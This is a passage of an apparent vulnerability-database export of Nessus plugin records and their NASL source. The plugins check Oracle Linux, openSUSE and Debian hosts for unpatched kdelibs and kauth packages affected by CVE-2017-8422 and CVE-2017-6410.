script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kdelibs-4.14.8-6.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kdelibs-apidocs-4.14.8-6.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kdelibs-common-4.14.8-6.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kdelibs-devel-4.14.8-6.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kdelibs-ktexteditor-4.14.8-6.el7_3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kdelibs / kdelibs-apidocs / kdelibs-common / kdelibs-devel / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:36:54", "description": "This update for kauth and kdelibs4 fixes the following issues :\n\n - CVE-2017-8422: logic flaw in the KAuth framework allowed privilege escalation (boo#1036244).", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-16T00:00:00", "type": "nessus", "title": "openSUSE Security Update : kauth / kdelibs4 (openSUSE-2017-575)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kauth-debugsource", "p-cpe:/a:novell:opensuse:kauth-devel", "p-cpe:/a:novell:opensuse:kauth-devel-32bit", "p-cpe:/a:novell:opensuse:kdelibs4", "p-cpe:/a:novell:opensuse:kdelibs4-apidocs", "p-cpe:/a:novell:opensuse:kdelibs4-branding-upstream", "p-cpe:/a:novell:opensuse:kdelibs4-core", "p-cpe:/a:novell:opensuse:kdelibs4-core-debuginfo", "p-cpe:/a:novell:opensuse:kdelibs4-debuginfo", "p-cpe:/a:novell:opensuse:kdelibs4-debugsource", "p-cpe:/a:novell:opensuse:kdelibs4-doc-debuginfo", "p-cpe:/a:novell:opensuse:libKF5Auth5", "p-cpe:/a:novell:opensuse:libKF5Auth5-32bit", "p-cpe:/a:novell:opensuse:libKF5Auth5-debuginfo", "p-cpe:/a:novell:opensuse:libKF5Auth5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libKF5Auth5-lang", "p-cpe:/a:novell:opensuse:libkde4", "p-cpe:/a:novell:opensuse:libkde4-32bit", "p-cpe:/a:novell:opensuse:libkde4-debuginfo", "p-cpe:/a:novell:opensuse:libkde4-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libkde4-devel", "p-cpe:/a:novell:opensuse:libkdecore4", "p-cpe:/a:novell:opensuse:libkdecore4-32bit", "p-cpe:/a:novell:opensuse:libkdecore4-debuginfo", "p-cpe:/a:novell:opensuse:libkdecore4-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libkdecore4-devel", "p-cpe:/a:novell:opensuse:libkdecore4-devel-debuginfo", "p-cpe:/a:novell:opensuse:libksuseinstall-devel", "p-cpe:/a:novell:opensuse:libksuseinstall1", "p-cpe:/a:novell:opensuse:libksuseinstall1-32bit", "p-cpe:/a:novell:opensuse:libksuseinstall1-debuginfo", "p-cpe:/a:novell:opensuse:libksuseinstall1-debuginfo-32bit", "cpe:/o:novell:opensuse:42.1", "cpe:/o:novell:opensuse:42.2"], "id": "OPENSUSE-2017-575.NASL", "href": "https://www.tenable.com/plugins/nessus/100202", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-575.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100202);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-8422\");\n\n script_name(english:\"openSUSE Security Update : kauth / kdelibs4 (openSUSE-2017-575)\");\n script_summary(english:\"Check for the openSUSE-2017-575 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for kauth and kdelibs4 fixes the following issues :\n\n - CVE-2017-8422: logic flaw in the KAuth framework allowed\n privilege escalation (boo#1036244).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1036244\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kauth / kdelibs4 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kauth-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kauth-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kauth-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs4-apidocs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs4-branding-upstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs4-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs4-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs4-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs4-doc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libKF5Auth5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libKF5Auth5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libKF5Auth5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libKF5Auth5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libKF5Auth5-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libkde4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libkde4-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libkde4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libkde4-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libkde4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libkdecore4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libkdecore4-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libkdecore4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libkdecore4-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libkdecore4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libkdecore4-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libksuseinstall-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libksuseinstall1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libksuseinstall1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libksuseinstall1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libksuseinstall1-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1|SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1 / 42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kauth-debugsource-5.21.0-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kauth-devel-5.21.0-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kdelibs4-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kdelibs4-apidocs-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kdelibs4-branding-upstream-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kdelibs4-core-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kdelibs4-core-debuginfo-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kdelibs4-debuginfo-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kdelibs4-debugsource-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kdelibs4-doc-debuginfo-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libKF5Auth5-5.21.0-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libKF5Auth5-debuginfo-5.21.0-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libKF5Auth5-lang-5.21.0-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libkde4-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libkde4-debuginfo-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libkde4-devel-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libkdecore4-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libkdecore4-debuginfo-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libkdecore4-devel-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libkdecore4-devel-debuginfo-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libksuseinstall-devel-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libksuseinstall1-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libksuseinstall1-debuginfo-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kauth-devel-32bit-5.21.0-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libKF5Auth5-32bit-5.21.0-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libKF5Auth5-debuginfo-32bit-5.21.0-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libkde4-32bit-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libkde4-debuginfo-32bit-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libkdecore4-32bit-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libkdecore4-debuginfo-32bit-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libksuseinstall1-32bit-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libksuseinstall1-debuginfo-32bit-4.14.18-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kauth-debugsource-5.26.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kauth-devel-5.26.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kdelibs4-4.14.25-7.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kdelibs4-apidocs-4.14.25-7.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kdelibs4-branding-upstream-4.14.25-7.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kdelibs4-core-4.14.25-7.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kdelibs4-core-debuginfo-4.14.25-7.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kdelibs4-debuginfo-4.14.25-7.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kdelibs4-debugsource-4.14.25-7.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kdelibs4-doc-debuginfo-4.14.25-7.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libKF5Auth5-5.26.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libKF5Auth5-debuginfo-5.26.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libKF5Auth5-lang-5.26.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libkde4-4.14.25-7.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libkde4-debuginfo-4.14.25-7.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libkde4-devel-4.14.25-7.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libkdecore4-4.14.25-7.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libkdecore4-debuginfo-4.14.25-7.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libkdecore4-devel-4.14.25-7.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libkdecore4-devel-debuginfo-4.14.25-7.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libksuseinstall-devel-4.14.25-7.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libksuseinstall1-4.14.25-7.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libksuseinstall1-debuginfo-4.14.25-7.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"kauth-devel-32bit-5.26.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libKF5Auth5-32bit-5.26.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libKF5Auth5-debuginfo-32bit-5.26.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libkde4-32bit-4.14.25-7.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libkde4-debuginfo-32bit-4.14.25-7.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libkdecore4-32bit-4.14.25-7.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libkdecore4-debuginfo-32bit-4.14.25-7.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libksuseinstall1-32bit-4.14.25-7.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libksuseinstall1-debuginfo-32bit-4.14.25-7.4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kauth-debugsource / kauth-devel-32bit / kauth-devel / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:37:04", "description": "Several vulnerabilities were discovered in kde4libs, the core libraries for all KDE 4 applications. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2017-6410 Itzik Kotler, Yonatan Fridburg and Amit Klein of Safebreach Labs reported that URLs are not sanitized before passing them to FindProxyForURL, potentially allowing a remote attacker to obtain sensitive information via a crafted PAC file.\n\n - CVE-2017-8422 Sebastian Krahmer from SUSE discovered that the KAuth framework contains a logic flaw in which the service invoking dbus is not properly checked. This flaw allows spoofing the identity of the caller and gaining root privileges from an unprivileged account.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-15T00:00:00", "type": "nessus", "title": "Debian DSA-3849-1 : kde4libs - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-6410", "CVE-2017-8422"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:kde4libs", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3849.NASL", "href": "https://www.tenable.com/plugins/nessus/100163", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3849. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100163);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-6410\", \"CVE-2017-8422\");\n script_xref(name:\"DSA\", value:\"3849\");\n\n script_name(english:\"Debian DSA-3849-1 : kde4libs - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in kde4libs, the core\nlibraries for all KDE 4 applications. The Common Vulnerabilities and\nExposures project identifies the following problems :\n\n - CVE-2017-6410\n Itzik Kotler, Yonatan Fridburg and Amit Klein of\n Safebreach Labs reported that URLs are not sanitized\n before passing them to FindProxyForURL, potentially\n allowing a remote attacker to obtain sensitive\n information via a crafted PAC file.\n\n - CVE-2017-8422\n Sebastian Krahmer from SUSE discovered that the KAuth\n framework contains a logic flaw in which the service\n invoking dbus is not properly checked. This flaw allows\n spoofing the identity of the caller and gaining root\n privileges from an unprivileged account.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=856890\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-6410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-8422\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/kde4libs\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-3849\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the kde4libs packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 4:4.14.2-5+deb8u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kde4libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"kdelibs-bin\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kdelibs5-data\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kdelibs5-dbg\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kdelibs5-dev\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kdelibs5-plugins\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kdoctools\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkcmutils4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkde3support4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkdeclarative5\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkdecore5\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkdesu5\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkdeui5\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkdewebkit5\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkdnssd4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkemoticons4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkfile4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkhtml5\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkidletime4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkimproxy4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkio5\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkjsapi4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkjsembed4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkmediaplayer4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libknewstuff2-4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libknewstuff3-4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libknotifyconfig4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkntlm4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkparts4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkprintutils4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkpty4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif 